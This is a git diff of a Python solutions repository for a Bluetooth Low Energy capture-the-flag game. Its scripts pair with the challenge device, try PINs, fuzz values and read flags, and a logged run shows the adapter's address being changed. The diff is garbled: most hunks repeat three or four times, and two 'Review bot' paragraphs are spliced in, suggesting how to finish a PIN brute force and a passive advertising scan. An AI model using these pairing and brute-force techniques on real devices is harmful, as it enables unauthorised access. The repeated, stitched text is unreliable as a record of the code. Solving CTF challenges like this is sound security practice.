@@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 
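Review bot: lvl_08_incomplete.py imports `binascii`, `struct`, `sys`, `os`, `time` and `bluepy.btle` but uses none of them, and its only content is the challenge text; a stub reads better when it states the plan, e.g. `# TODO: loop PIN 0000-9999 through pair_with_pin() from lvl_03.py, sending 'remove <mac>' before each attempt as lvl_03.py already does`. Whether the device rate-limits or locks out after wrong PINs is not visible here and would bound the attempt budget, so worth recording once known. The shebang `#! /usr/bin/python` is copied from the other scripts, which use Python 2 print statements.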
--- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py 
@@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py 
@@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py new file mode 100644 index 0000000..8f3a108 --- /dev/null +++ b/lvl_09_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Im advertising the flag + +''' diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md 
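Review bot: The level-9 hint "Im advertising the flag" points at the advertising payload, so the connect-and-read pattern the other scripts use (and the `btle` import this stub keeps for it) is not the right tool; a passive scan that collects advertising and scan-response data is. Worth recording in the stub so it is not written as another GATT read: `# TODO: passive scan (e.g. bluepy btle.Scanner) and inspect the advertising / scan-response data for the CTF address`. The stub also imports `binascii`, `struct`, `sys`, `os` and `time` unused.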
@@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' 
@@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic 
@@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py 
@@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py new file mode 100644 index 0000000..8f3a108 --- /dev/null +++ b/lvl_09_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Im advertising the flag + +''' diff --git a/notes.txt b/notes.txt index 71efc09..ed1bbbf 100644 --- a/notes.txt +++ b/notes.txt @@ -1,4 +1,11 @@ +Setup: + $> rfkill unblock all + $> btmgmt le on + $> systemctl start bluetooth + $> hciconfig hci0 up + $> hciconfig hci0 reset + $> hcitool lescan Search for MAC addresses around: hcitool lescan enumerate the MAC - bleah -b 11:22:33:44:55:66 -e \ No newline at end of file + bleah -b 11:22:33:44:55:66 -e diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null 
@@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py 
@@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py 
@@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py new file mode 100644 index 0000000..8f3a108 --- /dev/null +++ b/lvl_09_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Im advertising the flag + +''' diff --git a/notes.txt b/notes.txt index 71efc09..ed1bbbf 100644 --- a/notes.txt +++ b/notes.txt 
@@ -1,4 +1,11 @@ +Setup: + $> rfkill unblock all + $> btmgmt le on + $> systemctl start bluetooth + $> hciconfig hci0 up + $> hciconfig hci0 reset + $> hcitool lescan Search for MAC addresses around: hcitool lescan enumerate the MAC - bleah -b 11:22:33:44:55:66 -e \ No newline at end of file + bleah -b 11:22:33:44:55:66 -e diff --git a/solutions.txt b/solutions.txt new file mode 100644 index 0000000..e407ed4 --- /dev/null +++ b/solutions.txt 
@@ -0,0 +1,64 @@ +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_00.py +Attached to peripheral +Sending "12345678901234567890" to 0x2e +Done + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_01.py +Attached to peripheral +Loading level 1 +Reading value +Flag: eca7d1f3cf60a8b5344a + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_02.py +Attached to peripheral +Loading level 02 +Password Found: password1234 +Flag: eca7d1f3cf60a8b5344a + +/*** + * nano /etc/systemd/system/dbus-org.bluez.service + * set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat + */ +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_03.py +Attached to peripheral +Loading level 03 +Pairing +Attached to peripheral (pid 0) +Sending PIN: 0000 +Flag: b46fa238cf820d0f60c1 +Pairing successful + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_04.py +Attached to peripheral +Loading level 04 +Generating wordlist +Trying: AABBC8DDEEFF +Flag: f401f21d02fdd0a4fc00 + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_05.py +Attached to peripheral +Loading level 05 +Sending "121212121222" to 0x2c +Reading value +Flag: 84cf61c35b2d9c92217d + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_06.py +Attached to peripheral +Loading level 06 +Manufacturer: Cypress Semiconductor Corporation (305) +Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation) +New BD address: 11:22:33:44:55:66 +Address changed - Reset device now +Reading value +Flag: 1dec0e624f2ecf1513dc + +root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_07.py +[bp] Attached to peripheral +[++] Loading level 07 +[sp] starting bluetoothctl +[sp] Timeout +[sp] Pairing successful +[bp] Attached to peripheral +[==] Flag: a16ee1a4001c66c3a670